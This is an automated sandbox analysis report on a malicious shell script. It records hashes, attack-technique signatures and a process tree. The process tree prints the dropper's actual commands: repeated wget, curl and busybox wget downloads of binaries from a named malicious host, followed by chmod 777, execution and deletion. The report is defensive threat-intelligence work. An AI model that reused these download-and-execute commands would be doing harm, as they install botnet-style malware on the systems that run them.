Analysis
-
max time kernel
68s -
max time network
96s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
01-11-2024 03:00
Static task
static1
Behavioral task
behavioral1
Sample
344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh
-
Size
10KB
-
MD5
6fbfa1ebffef931402c957837d1ce7a3
-
SHA1
bff64ab4bb8667d6e4b480a6546aebf51b70e058
-
SHA256
344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b
-
SHA512
9d57a72ac5df656dca09cb391f0b533d9eb0a6c9a3a8b248805bd866dd31a00ef232144454417faf737e187432c59a2996cefbe856be787dd050ef1b70b75fe7
-
SSDEEP
96:YyK1mumemELvNLsxsLASq7Nb3eUyK1lFHgLi6gLgfgzgbytMKLZxrKCQp9p9pchl:K/WwKg8RYJaJ7
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1023 chmod 840 chmod 949 chmod 964 chmod 972 chmod 872 chmod 941 chmod 987 chmod 895 chmod 933 chmod 1002 chmod 918 chmod 979 chmod 995 chmod 857 chmod 865 chmod 903 chmod 911 chmod 765 chmod 785 chmod 1009 chmod 880 chmod 888 chmod 925 chmod 956 chmod 741 chmod 748 chmod 1016 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m 742 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s 749 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 767 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys 787 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh 841 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 858 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK 866 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do 873 oieViux5SkcOflukQEESWqzwe8qoXmU0do /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT 881 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq 889 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH 896 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb 904 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV 912 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA 919 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m 926 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s 934 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 942 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 950 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK 957 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do 965 oieViux5SkcOflukQEESWqzwe8qoXmU0do /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys 973 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh 980 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT 988 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb 996 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV 1003 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA 1010 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq 1017 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH 1024 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 745 curl 770 wget 945 wget 991 wget 1020 curl 726 wget 826 curl 879 busybox 932 busybox 937 wget 940 busybox 963 busybox 836 busybox 871 busybox 877 curl 900 curl 930 curl 968 wget 1001 busybox 853 busybox 885 curl 992 curl 1013 curl 976 curl 998 wget 845 wget 891 wget 894 busybox 899 wget 908 curl 971 busybox 984 curl 776 curl 910 busybox 914 wget 921 wget 938 curl 924 busybox 975 wget 791 wget 884 wget 887 busybox 892 curl 902 busybox 960 wget 986 busybox 1008 busybox 747 busybox 862 curl 929 wget 946 curl 948 busybox 1012 wget 1015 busybox 1022 busybox 1019 wget 861 wget 876 wget 953 curl 978 busybox 983 wget 731 curl 782 busybox 869 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 curl File opened for modification /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA curl File opened for modification /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys curl File opened for modification /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq curl File opened for modification /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do curl File opened for modification /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m curl File opened for modification /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 curl File opened for modification /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq curl File opened for modification /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb curl File opened for modification /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV curl File opened for modification /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s curl File opened for modification /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK curl File opened for modification /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb curl File opened for modification /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s curl File opened for modification /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT curl File opened for modification /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 curl File opened for modification /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA curl File opened for modification /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do curl File opened for modification /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m curl File opened for modification /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh curl File opened for modification /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT curl File opened for modification /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh curl File opened for modification /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK curl File opened for modification /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH curl File opened for modification /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys curl File opened for modification /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 curl File opened for modification /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV curl File opened for modification /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH curl
Processes
-
/tmp/344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh/tmp/344f97c18ebaa86ae678af8d31b5f037fb1390672970c506cfa5641e35b4a07b.sh1⤵PID:714
-
/bin/rm/bin/rm bins.sh2⤵PID:720
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- System Network Configuration Discovery
PID:726
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:740
-
-
/bin/chmodchmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:743
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:744
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- System Network Configuration Discovery
PID:747
-
-
/bin/chmodchmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:760
-
-
/bin/chmodchmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:769
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- System Network Configuration Discovery
PID:770
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- System Network Configuration Discovery
PID:782
-
-
/bin/chmodchmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Executes dropped EXE
PID:787
-
-
/bin/rmrm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:789
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- System Network Configuration Discovery
PID:791
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- System Network Configuration Discovery
PID:836
-
-
/bin/chmodchmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:844
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- System Network Configuration Discovery
PID:845
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- System Network Configuration Discovery
PID:853
-
-
/bin/chmodchmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:860
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- System Network Configuration Discovery
PID:861
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:864
-
-
/bin/chmodchmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:867
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:868
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- System Network Configuration Discovery
PID:871
-
-
/bin/chmodchmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do./oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:917
-
-
/bin/chmodchmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:944
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- System Network Configuration Discovery
PID:945
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- System Network Configuration Discovery
PID:948
-
-
/bin/chmodchmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:951
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:952
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:953
-
-
